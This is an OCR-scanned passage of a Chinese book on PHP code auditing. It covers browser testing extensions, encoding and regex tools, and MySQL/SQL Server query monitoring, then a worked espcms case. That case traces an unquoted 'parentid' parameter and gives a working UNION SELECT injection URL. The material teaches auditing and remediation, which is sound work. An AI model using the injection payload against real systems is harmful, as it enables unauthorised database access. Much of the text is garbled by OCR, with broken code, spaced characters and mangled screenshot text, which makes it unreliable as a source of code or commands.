Host: localhost Date: Sun, 31 Aug 2014 13:50:50 GMT 
User-Agent: a Server: Apache/2.1.9 (Win32) OpenSSL/ 
Accept: X-Powered-By: PHP/5. 3. 28 
text/html, application/xhtml-xml, application/xml ; q=0. 9, &/*;q-0.8 Keep-Alive: timeout=5, max=100 
Connection: Keep-Alive 
Áccept-Language: zh-cn, zh; q=0. 8, en-us; q- 0. 5, en; q=0. 3 Content-Type: text/html 
Accept-Encoding: gzip, deflate Content-Length: 54 
Connection: keep-alive 
pc201407182221\ administrator 
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在 下 面 的 浏览 器 扩展 介绍 里 ， 笔 者 会 着 重 介绍 Firefox 的 扩展 。 通 常 不 涉及 浏览 器 特性 的 漏洞 测 坛 ， 在 Firefox 下 测试 会 比较 方便 ; 涉及 浏览 器 特性 的 漏洞 测试 ， 则 需要 安装 不 同 的 浏览 器 。 这 里 推荐 一 个 
浏览 器 测试 软件 IEtester， 利 用 它 可 以 切换 上 浏览 器 内 核 版 本 ， 而 不 用 安装 所 有 版 本 的 | 浏览 器 。 接 下 来 介绍 常用 的 一 些 扩展 的 功能 和 使 用 方法 。 


1.HackBar 


Hackbar 是 安全 测试 最 常用 的 一 款 Firefox 扩 展 ， 主 要 作用 是 非常 方便 安全 人 员 对 漏洞 进行 手工 测试 。 它 有 三 个 输入 框 ， 分 别 是 URL、Post 数 据 以 及 Referer 的 参数 设置 ， 在 输入 框 上 部 还 提供 了 一 个 菜单 
栏 ， 有 各 种 各 样 编码 、 解 码 的 小 功能 。Hackbar 的 整体 界面 如 图 2-24 所 示 ， 箭 头 所 指 的 标注 框 里 面 就 是 Hackbar 了 。 


点 击 Load URL 即 可 从 Firefox 地 址 栏 获取 当前 URL， 点 击 Execute 之 后 即 可 发 送 我 们 设置 好 的 请 求 数据 。 


" A z| 百度 一 下 ， 你 就 知道 






























































< ) @ www.baidu.com U z vei- BE <Ctrl+K> P w 8 of 














Load URL http://www. baidu.com/ 
Split URL 
Execute 
[V] Enable Post data Enable Referrer 














图 2-24 


2.Firebug 


Firebug 是 一 款 开 发 者 工具 ， 功 能 与 火狐 自 带 的 开发 者 工具 差不多 ， 支 持 直接 对 网 页 HTML、(C9s 等 元 素 进行 编辑 ， 其 中 的 “网 络 ”功能 可 以 直接 噢 探 Request 和 Response 数 据 包 。 通 常 在 利用 一 些 支 付 
漏洞 或 者 SQL 注入 漏洞 的 时 候 ， 我 们 只 需要 把 鼠标 指针 定位 到 要 修改 的 网 页 区 域 ， 右 键 点 击 “ 使 用 Firebug 查 看 元 素 ” 即 可 对 网 页 进行 修改 测试 漏洞 ，Firebug 的 界面 图 如 图 2-25 所 示 。 
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| Cookies 
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@ GET all instant sear« 
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@ GET baidu_joylogo3.g 


3.Live HTTP Headers 
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Live HTTP Headers 主 要 的 功能 是 抓 取 浏览 器 Request 和 Response 数 据 包 ， 也 支持 对 Request 数 据 进行 修改 后 再 次 请 求 。 不 好 的 一 点 在 于 它 只 能 抓 取 到 HTTP 的 数据 ， 对 HTTPS 无 效 ， 不 过 用 来 分 析 简 单 
页 面 数据 它 已 经 足够 。Live HTTP Headers 的 界面 如 图 2-26 所 示 。 


Headers | 的 的 


| HTTP Headers 


GET / HTTP/1.1 


Host: www. baidu.zom 








Connection: keep-alive 


HTTP/L1 200 OK 


Transter-Encoding: chunked 





Accept-Encoding: gzip, deflate 
Cookie: BAIDUID-6C6B7CC79F3904723ADOE614E2333C62:FG- 1; BD UP | 


Date: Tue, 23 Sep 2014 14:39:55 GMT 
Content-Type: text/html; charset-utf-8 


Accept-Language: zh-cn,zh:q=0.8,en-usq=0.5,en;q=0.3 


| @ Live HTTP Replay. 


GET — *  http//wvrwbaidu.com/ 
HITP Headers 


Host: www.baidu.com 

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW rv;30,0) Gecko/20100101 Firefox/30.0 
Accept text/html, application/xhtrnl 4 xml,application/xml;q- 0.9," /^q-U.8 
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,eng=0.3 

Accept-Encoding: gzip, deflate 


User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko/201088 | Cookie: BAIDUID-6C6B7CC79F2004723ADQE614E2333C62.FG-1; BD_UPN=133143. 
| Accept: text/htmlapplication/xhtrml+xml,application/xmlq=0.9,*/*;q=0.8))) | BD_HOME=0 
| 


Connection: keep-alive] 


C] Send POST Content ? 


Content-Length 0 
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首先 勾 选 Capture 复 选 框 ， 然 后 开始 在 浏览 器 中 请 求 页 面 即 可 ， 选 中 抓 到 的 数据 包 ， 点 击 Replay 按 钮 可 对 数据 进行 编辑 和 重新 发 送 。 


4.Modify 


Modify 是 一 款 火 狐 扩 展 工具 ， 顾 名 思 义 ， 这 是 一 款 用 来 修改 的 扩展 ，Modify 仅 支持 添加 和 修改 Request 中 HTTP Header 的 字段 ， 而 且 它 是 做 全 局 修改 ， 即 开启 Modify 之 后 ， 它 会 把 浏览 器 对 任何 网 站 
的 所 有 请 求 中 对 应 字段 进行 修改 。 下 面 就 介绍 它 的 使 用 方法 ， 图 2-27 就 是 Modify 的 主 界面 。 


@ Modify Headers T 7 de wh 
S a Ka G 


Start Headers Options About Help 


Action Name Comment 


Modify cookie 
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使 用 非常 简单 ， 在 图 中 Modify 的 下 拉 框 中 选择 要 执行 的 模式 ， 有 Modify、Add 以 及 Filter， 然 后 在 后 面 的 两 个 输入 框 输入 参数 名 以 及 参数 值 ， 点 击 Save 再 点 击 左上 角 的 Start 按 钮 即 可 启动 Modify。 


通过 抓 包 可 以 看 到 以 及 将 访问 百度 的 请 求 中 cookie 的 值 修改 成 了 “seay”， 如 图 2-28 所 示 。 





[Headers | Generator] Config About. 





HTTP Headers 


http://www.baidu.com/ @ Modify Headers 


SijxXE 


GET / HTTP/1.1 Headers Options About 


Host: www.baidu.com 


User-Agent: Mozilla/5.0 (Windows NT 6.1; WO —— — | 
Lif, cookie seay Descrit 


"| | Action Name Value Comment 
Accept-Encoding: gzip, defla Modify cookia — 
DNT: 1 | 
Cookie: seay 








Connection: keep-alive 


Cache-Control: max-age=0 


HTTP/1.1 200 OK 
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2.3.3 ”编码 转换 及 加 解密 工具 


代码 审计 必然 要 接触 到 编码 相关 的 知识 ， 历 史上 很 多 高 危 的 漏洞 是 由 编码 问题 导致 的 ， 比 如 在 XSS 漏 洞 中 可 以 利用 浏览 器 对 不 同 编码 的 支持 来 绕 过 过 滤 触 发 漏洞 ， 另 外 我 们 也 经 常 需要 用 到 不 同 的 编码 
转 码 来 进行 模糊 测试 漏洞 。 另 外 是 加 解密 以 及 Hash 算 法 ， 在 代码 审计 中 ， 我 们 经 常 遇 到 程序 对 特定 字符 进行 加 密 或 者 Hash 后 用 作 Cookie 和 Session， 或 者 是 用 户 密码 的 保存 通常 也 会 加 密 ， 所 以 我 们 必须 要 
了 解 常用 的 加 解密 方式 ， 在 后 面 会 详细 列举 常见 加 解密 方式 及 原理 ， 这 里 就 不 详细 介绍 。 下 面 笔者 推荐 几 款 编 码 转换 和 加 解密 的 工具 。 


1.Seay 代 码 审计 系统 自 带 的 编码 功能 


主 界面 菜单 栏 点 击 “ 正 则 编码 ” 即 可 打开 该 功能 ， 目 前 支持 Md5 算 法 、URL、Base64、Hex、AsCll、Unicode 多 种 常用 编码 方式 转换 。 另 外 还 针对 MySQL 与 MSSQL 注 入 等 做 利用 格式 做 针对 性 处 理 ， 
主 界面 如 图 2-29 所 示 。 


fetc/passwd| 


编码 ; Mash OME: @ GE O MySqlChar O MsSqlChar O String fromChar 
ARAR 


—À pr ei ee ee 


Teile U: Pb1TUT£8930b783a 
Sief: ZBiTÜTFGS39B203A 








‘pa M: e50B8bTc?b1TOT£f8839b283a2T58a591 
Ey: CSOBSBTC2B1TOTFSSS9B2SSA2TSOARSI 
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2.Burp Suite 上 有 一 个 Decoder 功 能 


这 个 功能 可 对 字符 串 进 行 编 码 和 解码 ， 支 持 百 分 号 、Base64、AsCll 等 多 种 编码 转换 ， 还 支持 Md2、Md5、sha 系 列 等 Hash 算 法 。 它 的 使 用 也 非常 简单 ， 只 需要 输入 要 转换 要 的 字符 ， 选 择 需 要 转换 成 
的 编码 即 可 ， 如 图 2-30 所 示 。 
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图 2-30 
3. 超 级 加 解密 转换 工具 


另外 介绍 一 个 专门 用 来 加 解密 的 国产 小 工具 ,支持 的 算法 比较 多 ， 独 立 的 exe 文 件 轻巧 干净 ， 在 百度 搜索 “超级 加 解密 转换 工具 ” 即 可 找到 这 款 小 软件 ， 使 用 界面 如 图 2-31 所 示 。 


超 颁 加 解密 转换 工具 V2.1 (支持 104 种 方法 ) 
选项 (C) BENZ 帮助 (H) 





啊 呵 软件 :5. 1. we 呵呵 QQ541231936 


Rijndael AES 
^ Serpent 


当前 方法 :RC4 
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加 密 : 使 用 的 时 候 只 要 在 软件 右 侧 的 “方法 分 类 选择 ”中 选择 加 密 方 式 ， 在 “明文 ”输入 框 中 输入 需要 “加 密 ” 的 字符 串 ， 点 击 “ 加 密 ” 即 可 在 “ 密 文 ” 框 中 看 到 加 密 后 的 结果 。 


解密 : 使 用 的 时 候 只 要 在 软件 右 侧 的 “方法 分 类 选择 ”中 选择 解密 方式 ， 在 “ 密 文 ”输入 框 中 输入 需要 解密 的 字符 串 ， 点 击 “ 解 密 ” 即 可 在 “明文 ” 框 中 看 到 解密 后 的 结果 。 


2.34 ”正则 调试 工具 


正则 表达 式 是 用 自 定 义 好 的 特定 字符 组 合 ， 在 正则 解析 引擎 内 进行 字符 匹配 。 正 则 表达 式 有 非常 强 的 灵活 性 ， 在 很 多 不 同 的 场景 都 会 用 到 正则 表达 式 ， 比 如 验证 注册 用 户 名 、 邮 箱 等 格式 是 否 合格 ， 再 
比如 用 来 搜索 文件 内 容 ， 很 大 一 部 分 的 WAF (Web 应 用 防火 墙 ) 的 规则 也 是 基于 正则 表达 式 ， 等 等 ， 可 谓 无 处 不 在 ， 然 而 如 果 正 则 表达 式 写 得 不 严谨 ， 就 经 常会 导致 各 种 bug 出 现 ， 像 防火 墙 被 绕 过 ， 等 


首先 要 熟悉 正则 表达 式 的 用 法 ， 熟 悉 各 个 符号 的 含义 ， 这 样 我 们 才能 写 出 严谨 的 正则 表达 式 ， 才 能 在 代码 审计 中 发 现 别人 正则 表达 式 的 问题 所 在 。 
笔者 就 不 在 这 里 详细 的 介绍 正则 表达 式 的 详细 用 法 ， 网 上 可 以 找到 很 多 关于 正则 表达 式 的 详细 教程 ， 这 里 仪 介绍 几 个 常用 的 正则 表达 式 调试 工具 。 
1.Seay 代 码 审计 系统 中 自 带 的 正则 调试 功能 


在 Seay 代 码 审 计 系统 的 菜单 栏 点 击 “ 正 则 编码 ”项 ， 即 可 看 到 正则 调试 功能 的 主 界面 ， 它 支持 正则 实时 预览 ， 即 你 在 输入 框 修改 正则 表达 式 或 者 要 匹配 的 源 字符 的 时 候 ， 调 试 的 结果 会 实时 显示 在 下 方 
的 信息 栏 中 ， 非 常 的 直观 和 方便 。 效 果 图 如 图 2-32 所 示 。 
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除了 实时 调试 ， 它 还 支持 实时 解码 调试 ， 一 些 特 殊 字 符 我 们 无 法 在 输入 框 输入 ， 但 是 可 以 利用 编码 处 理 后 输入 ， 只 要 设置 解码 选项 ， 程 序 在 用 正则 匹配 前 会 先 将 源 字符 进行 指定 的 编码 转换 后 在 进入 正 
则 引 警 匹配， 目前 支持 URL 编 码 、Base64 编 码 以 及 Hex 编 码 ， 使 用 效果 如 图 2-33 所 示 。 
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2. 灵 者 正则 调试 


Ni E th 


这 是 一 款 从 RenGod ( 灵 者 更 名 ) 中 提取 出 来 的 绿色 版 正则 调试 工具 ， 单 文件 的 大 小 只 有 400 多 K， 支 持 正则 搜索 、 正 则 替换， 也 同样 支持 实时 预览 ， 在 正则 性 能 上 也 做 的 相当 不 错 。 如 图 2-34 所 示 是 它 
的 主 界面 。 


这 款 工 具 使 用 起 来 也 非常 简单 ， 比 如 正则 搜索 功能 的 使 用 ， 将 要 搜索 的 文本 放 入 到 “要 搜索 的 文本 ”输入 框 中 ， 在 “正则 表达 式 ” 输 入 框 中 输入 正则 表达 式 ， 即 可 实时 的 在 下 方 看 到 匹配 上 的 结果 。 


2.3.5 SQL 执行 监控 工具 


SQL 执 行 监控 可 以 非常 高 效 地 帮助 我 们 发 现 一 些 SQL 注 入 和 XSS 等 问题 ， 帮 助 我 们 非常 方便 地 观察 到 数据 在 Web 程 序 与 数据 库 中 的 交互 过 程 ， 在 做 模糊 测试 时 ， 只 需 利 用 模拟 测试 工具 乳 取 页 面 的 URL 及 
表单 ， 提 交 特 定 的 参数 如 带 单 引号 ( “) 等 ， 通 过 分 析 SQL 执 行 日 志 则 可 以 非常 准确 地 判断 出 SQL 注 入 漏洞 是 否 存 在 ， 同 样 的 注入 <>” 等 符合 也 可 以 用 来 测试 XSS 漏 洞 。 


d z | — = - | 
sj! 灵 者 正则 调试 器 (RE God) v1.3 - 开发 : RAMA - 从 灵 者 更 名 4.0 提取 出 来 的 正则 调 Kull Shi, 
^$**-7. (pattern) xy In} {n,} inm} [xyz] [xyz] [a-z] [/m-z] 5b 3B AdADAE An Ar 5s AS Mt 5v hw AW inum in 


EUER LE | 匹配 HTIL 标 记 = po" [-] Bc [y] 车 局 由 [y] E HJIR 


要 搜索 的 文本 


| S 搜索 结果 - 匹配 数量 :1, 子 匹 配 数 量 :0 
F5 MEXE 
(1) RE God 
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这 里 分 别针 对 MySQL 和 MSSQL 列 举 SQL 执 行 监控 的 工具 和 使 用 方法 ， 其 中 着 重 介绍 MySQL 的 监控 ， 因 为 PHP 大 多 都 是 使 用 的 MySQL 作 为 存储 。 


针对 MySQL 的 执行 监控 ,笔者 没有 找到 比较 好 的 工具 ， 于 是 在 自己 的 代码 审计 系统 上 加 入 了 这 么 一 个 插件 ， 主 要 原理 是 开启 MySQL 的 general_log 来 记录 MySQL 的 历史 执行 语句 ， 它 有 两 种 记录 方式 ， 
默认 是 通过 记录 到 文件 方式 ， 另 外 一 种 是 通过 直接 记录 到 MySQL 库 的 general_log 表 中 ， 为 了 更 方便 地 查询 ， 我 选择 的 是 记录 到 MySQL 数 据 库 的 方式 。 另 外 这 个 功能 的 开启 方式 也 有 两 种 ， 一 种 是 直接 用 


MySQL 的 SQL 语句 开启 ，SQL 语 句 如 下 : 





set global general A CA 
SET GLOBAL log output-'table' 











执行 结果 如 图 2-35 所 示 。 
这 些 步骤 在 笔者 的 工具 中 都 自动 完成 了 ， 同 时 它 还 支持 快速 过 滤 实 时 预览 。 只 要 点 击 下 断 ， 操 作 完 之 后 点 击 更 新 即 可 看 到 这 段 时 间 内 在 MySQL 执 行 过 的 所 有 SQL 语句 ， 主 界面 如 图 2-36 所 示 。 


mysql> Show global | variables like  Agenera^"; 


| general. log 
| general. log - file | D : \phpStudy\MySOL\data\ali-081518n. log | 


2 rows in set (0.00 sec) 


mysql> set global general, log-on; 
Query OK, O rows affected (0.03 sec) 


mysql> SET GLOBAL log_output= table 
Query OK, O rows affected (0.00 see) 





图 2-35 


: Casal EINE 
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执行 过 程 
| 查询 时 间 Sms t) 


2014/10/11 14:50 select user fron Eranl, user 


| | ss | 搜索 : select 


ENS. 123456 


[2014/10/11 14:50 select password from mysql. user 
[2014/10/11 14:50 select + trem mysql. user 


He: 2014-10-11 14:50:01 {T#u: 3 





图 2-36 


另外 一 种 开启 方法 是 在 MySQL 配 置 文件 中 修改 ， 在 [mysqld] 配 置 中 加 入 如 下 代码 : 





general log-ON 


general log file-(H &&4£)/query.log 

















重启 MySQL 后 可 以 看 到 所 有 的 SQL 查询 语句 都 会 记录 在 设置 的 这 个 文件 中 。 


SQL server 执 行 监控 也 很 简单 ， 在 SQL Server 上 自 带 有 一 个 性 能 监控 的 工具 SQL Server Profiler， 在 开始 菜单 里 可 以 找到 它 ， 使 用 SQL Server Profiler 可 以 将 SQL 执行 过 程 保存 到 文件 和 数据 库 表 ， 同 
时 它 还 支持 实时 查看 和 搜索 。 


下 面 我 们 来 看 看 怎么 使 用 它 ， 打 开 SQL Server Profiler 后 ， 在 左上 角 的 菜单 栏 里 选择 “文件 一 新 建 跟 踪 ”， 在 常规 栏 输 入 跟踪 名 (随意 ) 后， 点击 “事件 选择 ”标签 ,我 们 只 需要 SQL 执 行 过 程 ， 所 以 


要 过 渡 掉 一 些 干扰 的 东西 ， 比 如 登录 、 退 出 等 ， 在 事件 选择 里 只 保留 TSQL 下 面 的 SQL: BatchCompleted 事 件 ， 然 后 点 击 “ 运 行 ”， 如 图 2-37 所 示 。 
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(Events | TextDats | ApplicationHsme | NTUser¥ame LozinMame | CPU | Reads | Writes | Duration | ClientProc 


{=| Security udii 
[^ Audit Login 
[ Audit Logout 

ie] Sessions 
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图 2-37 


运行 后 监控 的 到 SQL 语句 如 图 2-38 所 示 。 


44] SQL Server Profiler = [testi (J] 
m eh) SE) MEV) BR) 工具 (T) BOW 才 助 (H) 
ANSGawra2|> us |SHB8|Dale 


a ErentClass 


| Trace Start 


i TextData 


SELECT * FROM [master]. [dbo]. [log] 


SSL:BatchCompleted SELECT 123456 
SQL:BatchCompleted SELECT 123456 
SQL :BatchCompleted 
SQL :BatchCompleted 


SOL: BatchCompleted 


SELECT 123456 
SELECT dtb. name AS [Name], 
SELECT 654321*1111 


dtb. data... 


StartTime 


2014-10-23 


2014-10-23 
2014-10-23 
2014-10-23 
2014-10-23 
2014-10-23 


2014-10-23 


EndTime 


2014-10-23 


2014-10-23 


2014-10-23 
2014-10-23 
2014-10-23 
2014-10-23 


Applicati 


Microsoft 
Microsof 
Microsof 
Microsoft 
Microsoft 


Microszof 


AST(case when dth name in ('marter'.'model'.'medb , tempdh ) then 1 else dth. ie distributor end AS bit) AS [IsSystemObject] 
AST|has dbaccessdtb.name) AS bit) AS [IsAccessible] 


[Name] ASC 
go 


SELECT 65432171111 
Eo 





图 2-38 


从 图 中 监控 结果 可 以 非常 清楚 第 看 到 之 前 执行 的 SQL 语句 以 及 开始 执行 时 间 、 结 束 时 间 。 


二 部 分 ”漏洞 友 现 与 防 沁 


二 部 分 包括 第 3~ 8 章 一 共 六 章 ， 将 着 重 介绍 PHP 代 码 审计 的 中 漏洞 挖掘 思路 与 防范 方法 。 
其 中 第 3 章 详细 介绍 PHP 代 码 审 计 的 思路 ， 包 括 根据 关键 字 回 溯 参 数 、 通 读 全 文 代码 以 及 根据 功能 点 定向 挖掘 漏洞 的 三 个 思路 。 
第 4~ 6 章 介绍 常见 漏洞 的 审计 方法 ， 共 分 为 基础 篇 、 进 阶 篇 以 及 深入 篇 ， 涵 盖 SQL 注 入 漏洞 、Xss 漏 洞 、 文 件 操作 漏洞 、 代 码 /命令 执行 漏洞 、 变 量 履 盖 漏 洞 以 及 逻辑 处 理 等 漏洞 。 
第 7 章 介 绍 二 次 漏洞 的 挖掘 方法 ， 二 次 漏洞 在 逻辑 上 比 常规 漏洞 要 复杂 ， 所 以 我 们 需要 单独 拿 出 来 以 实例 来 进行 介绍 。 
在 经 过 前 面 几 章 的 代码 审计 方法 学 习 之 后 ， 相 信 大 家 已 经 能 够 挖掘 不 少 有 意思 的 漏洞 ， 在 第 8 章 ， 将 会 介绍 更 多 代码 审计 中 的 小 技巧 ， 利 用 这 些小 技巧 可 以 挖掘 到 更 多 有 意思 的 漏洞 。 


每 类 漏洞 都 有 多 个 真实 漏洞 案例 的 分 析 过 程 ， 可 以 真正 帮助 大 家 学 习 代码 审计 的 经 验 ， 不 过 这 些 内 容 不 仅仅 是 介绍 了 漏洞 的 挖掘 方法 ， 还 详细 介绍 了 这 些 漏洞 的 修复 方法 ， 对 开发 者 来 说 是 非常 有 用 的 


第 3 草 ”通用 代码 审计 思路 

代码 审计 工具 的 实现 都 是 基于 代码 审计 经 验 开 发 出 来 的 优化 工作 效率 的 工具 ， 我 们 要 学 好 代码 审计 就 必须 要 熟悉 代码 审计 的 思路 ， 只 有 在 了 解 了 这 些 思路 之 后 ， 我 们 才 知道 如 何 下 手 ， 如 何 最 高 效 地 挖 
掘 到 最 有 质量 的 漏洞 ， 常 见 的 代码 审计 思路 有 以 下 四 种 : 

1) 根据 敏感 天 键 字 回溯 参数 传递 过 程 。 

2) 查找 可 控 变 量 ， 正 向 追踪 变量 传递 过 程 。 

3) 寻找 敏感 功能 点 ， 通 读 功 能 点 代码 。 


4) 直接 通读 全 文 代码 。 


下 面 我 们 就 来 看 看 这 几 种 代码 审计 思路 在 实际 场景 中 的 应 用 。 


3.1 ”敏感 消 数 回溯 参数 过 程 


根据 敏感 函数 来 逆向 追踪 参数 的 传递 过 程 ， 是 目前 使 用 得 最 多 的 一 种 方式 ， 因 为 大 多 数 漏洞 是 由 于 函数 的 使 用 不 当 造 成 的 。 另 外 非 函数 使 用 不 当 的 漏洞 ， 如 SQL 注入 ， 也 有 一 些 特征 ， 比 如 Select、 
Insert 等 ， 再 结合 From 和 Where 等 关键 字 ， 我 们 就 可 以 判断 这 是 否 是 一 条 SQL 语句 ， 通 过 对 字符 串 的 识别 分 析 ， 就 能 判断 这 个 SQL 语句 里 面 的 参数 有 没有 使 用 单 引号 过 滤 ， 或 者 根据 我 们 的 经 验 来 判断 。 像 
HTTP 头 里 面 的 HTTP_CLIENT_IP 和 HTTP_X_FORWORDFOR 等 获取 到 的 IP 地 址 经 常 没有 安全 过 滤 就 直接 拼接 到 9QL 语 句 中 ， 并 且 由 于 它们 是 在 $_ SERVER 变量 中 不 受 GPC 的 影响 ， 那 我 们 就 可 以 去 查找 
HTTP CLIENT IP 和 HTTP_X FORWORDFOR 关 键 字 来 快速 寻找 漏洞 。 


这 种 方式 的 优点 是 只 需 搜索 相应 敏感 关键 字 ， 即 可 以 快速 地 挖掘 想 要 的 漏洞 ， 具 有 可 定向 挖掘 和 高 效 、 高 质量 的 优点 。 
其 缺点 为 由 于 没有 通读 代码 ， 对 程序 的 整体 框架 了 解 不 够 深入 ， 在 挖掘 漏洞 时 定位 利用 点 会 花费 一 点 时 间 ， 另 外 对 逻辑 漏洞 挖掘 覆盖 不 到 。 
espcms 注 入 挖掘 案例 


我 们 来 举 一 个 根据 关键 字 回溯 的 例子 ， 用 PHP 程 序 espcms 举 例 ， 使 用 Seay 源 代码 审计 系统 做 演示 ， 首 先 载 入 程序 ， 然 后 点 击 自动 审计 ， 得 到 一 部 分 可 能 存在 漏洞 的 代码 列表 ， 如 图 3-1 所 示 。 


Bm emus P 审计 插 御 ， J KBE JC BEEN LESE 弹 正则 编码 由 临时 记录 A ENEE 。 c 关于 至 统 
词句 : 


HHE E 
MAHA TIL. JRE eS A finden. plp include admin ROOT . “interface/farchive. php”; 
TnS been r nE, Ol Reeds ttl fadminsoftfindex. php include admin ACOT adninfils “feontrol/ferchive. php"; 
SIIA A delete hf FETES ERES BDHePPIESHLIE ATER] /adminsoft’ control acnessagenain. php ithis-?db-2query l UFIATE ' . $db table . ° SEI" . $db set . ° (70. Edb where): 
ERIALA EMRE » KITI REFERERE E: AABEL..  fadminsoft/ control/adninuser. php $linkUEL = f SERVEE[' HITE_KEFEREL’ ]; 
SALIBA Aldd ete pee foes SP RBIBETFTESQLZE ^ fer Bl fFadminzaft!control/adninuzer.phg this- *db- query Ü UPDATE | . Sdb_tabl= . * SET ' . $db set. * Co. PdbeFher el; 
SOLD Al del ote hse pore a ZEP. PYRE ESOL MTAA] fadminssft/! control, adninaser. php fthTE-d5-7Qquery l update ^o. $db talla . 7o set” ;db sat. * t- T7. £db_whers]; 
SOLS nl nsert Of SESE Bs SFR. n[BeTTTESUDCE ATA)  ,jadminzaft/control/advertnair. php Sthis-?^dh-2query L INSERT TNI "TECTETNTE — emer 7) VALUES C 2 fdboval 
suLig Aldel ete SEA SES Sa lS (etre: RIS ESSGEGSMERB]  Á/adminsoft/control/advertnair. php $this-?db-2query | UFIATE ' . $db table . ' SEI ' . $db set . ' WHERE . $db where]; 
TRAA FTES, Pl heli E eS a fadminsoft? control advertiypemain php include once admin ROOT . 'daiacsche!/ . [lag . ' pack pho’, 
nri pect ob i SRE So ES - rini li Janira idis es ae ip s a LE tah Ei 


= ajo sate IE " INZHE DT 
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我 们 挑 其 中 的 一 条 代码 ， 如 图 3-2 所 示 。 


SQUE Blinsert Mii A Pes ws EQ. nDETITISQDEO ERES  /adminzoft/control/callmain php $thiz-2db-2query ( INSERT INTO ' . $db table . ' C . $db field. 
SOLIS n]deleterchippri Was Ein. nIHETITISQLI ACHSE]  /adminzoft/control/callmain. php fthiz-2db-2query (UPDATE ' . fdb table . ' SET ' ,$b set . ' W 


SqLBaselectrhigjPrEHnms5p SIRs BIREIRIESQLEO ER[ — /adeinzeft/control/citylist. php $sql = “select * from $db_table where parentid=fparentid’ ; 
NARESH PFS &, RIFFS ia /adminsoft/control/connected, php include once admin_ROOT . 'public/plug/payment/ . $plugcoede ， 
i BS Tes gE : - , , 3 
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双击 该 项 直接 定位 到 这 行 代 码 ， 如 图 3-3 所 示 。 


在 选中 该 变量 后 ， 在 下 方 可 以 看 到 该 变量 的 传递 过 程 ， 并 且 点 击 下 方 的 变量 传递 过 程 也 可 以 直接 跳 转 到 该 项 代码 处 ， 可 以 非常 直观 地 帮助 我 们 看 清 整个 变量 在 该 文件 的 传递 过 程 。 另 外 我 们 可 以 看 到 
$parentid 变 量 是 在 如 下 代码 段 获得 的 : 











Sparentid = $this->fun->accept ('parentid', 'R') ; 
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class important extends connector { 


function important() { 
Sthis->softbase (true); 


is 


oncitylist t 
important 

一 变量 列表 -- 

$list 

$rsList[' cityname’ ] 
trsList['id ] 


=] y in 


function oncitylist() { 


un co 


$parentid = empty($parentid) ? 1 : $parentid; 
Sverid = $this-»fun-»accept('verid', 'H'): 
Sverid = empty(S$verid) ? 0 : Sverid; 

sdb table = db prefix . 'city'; 

$sql = "select * from $db table where parentid- 
$rs = $this->db->query ($sql); 


= 


if (S$verid == $rsList['id']) { 
} else { 
} 


} 
exit ($list); 
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$list.-'«option valuez"' , $rasList['id'] 


Sparentid = $this->fun-Saccept("parentid', 'E'): 


Y mM Y" 





fparentid = $this->fun-Paccept C parentid' , 'R'); 
$sql = "select * from $db table where parentid-$parentid"; 


a 详细 信息 
2 


右键 选中 该 代码 定位 该 函数 主体 ， 如 图 3-4 所 示 。 


function oncitylist() { 
$parentid = $this->fun-> 
$parentid = empty ($parentid) 
$verid = $this->fun->accept ( ' 
$verid = empty ($verid) ? | 
$db table = db prefix . -` 


$501 = "select * from $db tak jp Irentid"; 


$rs -一 $this-»db-»query ($sql) 
for ($i = 0; SrsList = $this- saat i; 
if ($verid = SrsList['id 


$list.-'«option selected value="! . S$rsList['id'] 


$i++) 


$lisrt.-'«option selec AU t['id'] 


) else { 
Slist.='<option value 


} 
exit ($1list}; 


notepad++ 打 开 
EditPlus}I FF 


可 以 看 到 跳 转 到 了 class function.php 文 件 的 314 行 ， 代 码 如 下 : 








function accept ($k, Svar = 'R', S$htmlcode = true, Srehtml = false) { 
switch (Svar) { 

case 'G': 

Svar = &$ GET; 





case 'P': 

Svar = &$ POST; 
break; 

case 'C': 

Svar = &$ COOKIE; 
break; 














i Ws, i 


for ($i = 0; $rsList = $this-»db-»fetch array($rs): $i++) i 


ws." 


. S$rsList['c 





i 
9" TT » r 


SrsList 





case 'R': 

Svar = &$ GET; 

if (empty (Svar[$k]) ) { 
Svar = &$ POST; 

} 


break; 








F 


} 
Sputvalue = isset ($var[$k]) ? $this->daddslashes ($var[$k], 0) : NULL; 
return Shtmlcode ? ($rehtml? $this->preg_htmldecode ($putvalue) : $this-> htmldecode ($putvalue) ) : Sputvalue; 


可 以 看 到 这 是 一 个 获取 GET、POST、COOKIE 参 数值 的 函数 ， 我 们 传 入 的 变量 是 parentid 和 R， 则 代表 在 POST、GET 中 都 可 以 获取 parentid 参 数 ， 最 后 经 过 了 一 个 daddslashes () 函数 ， 实 际 上 是 包 
装 的 addslashes () 函数 ， 对 单 引 号 等 字符 进行 过 滤 ， 不 过 注意 看 前 面 的 SQL 语句 是 这 样 的 : 











$sql = "select * from $db table where parentid-$parentid"; 


并 不 需要 单 引号 来 闭合 ， 于 是 可 以 直接 注入 。 


在 citylist php 文 件 看 到 oncitylist () 函数 在 important 类 中 ， 选 中 该 类 名 右键 点 击 “ 全 局 搜索 ”功能 ， 如 图 3-5 所 示 。 


KHAS AEF 


fadminsoft/index, php $eontrol = new important (); 
/adminsoft/control/acmessagemain. php class important extends connector { 
fadminsoft/ control/acmessagemain. php function important() 1 

fadminsoft/ control/adminuser. php class important extends connector | 


fadminsoft/ control; adminuser. php function important () 1 





可 以 看 到 index.php 文 件 有 实例 化 该 类 ， 代 码 如 下 : 


Sarchive = indexget ('archive', 'R') ; 
Sarchive = empty ($archive) ?  'adminuser' : Sarchive; 
Saction = indexget ('action', 'R') ; 
$action = empty ($action) ?  'login' : $action; 
include admin ROOT . adminfile . "/control/Sarchive.php"; 
$control = new important () ; 
Saction = 'on' . Saction; 
if (method exists ($control, $action) ) { 
Scontrol->Saction () ; 
} else { 
exit (' 错 误 : 系统 方法 错误 ! ') ; 

















} 





这 里 可 以 看 到 一 个 include 文 件 的 操作 ， 可 惜 经 过 了 addslashes () 函数 无 法 进行 截断 使 其 包含 任意 文件 ， 只 能 包含 本 地 的 PHP 文 件 ， 如 果 你 有 MySQL 的 root 权 限 ， 能 导出 文件 到 tmp 目 录 ， 不 能 导出 
到 Web 目 录 ， 这 种 场景 才 用 得 到 这 个 文件 包含 ， 再 往 下 走 就 是 实例 化 类 并 且 调用 函数 的 操作 了 ， 根 据 代 码 可 以 构造 出 利用 EXP : 





http: //127.0.0.1/espcms/adminsoft/index.php? archive-citylist&action-citylist&parentid--1 union select 1, 2, user () , 4, 5 


漏洞 截图 如 图 3-6 所 示 。 


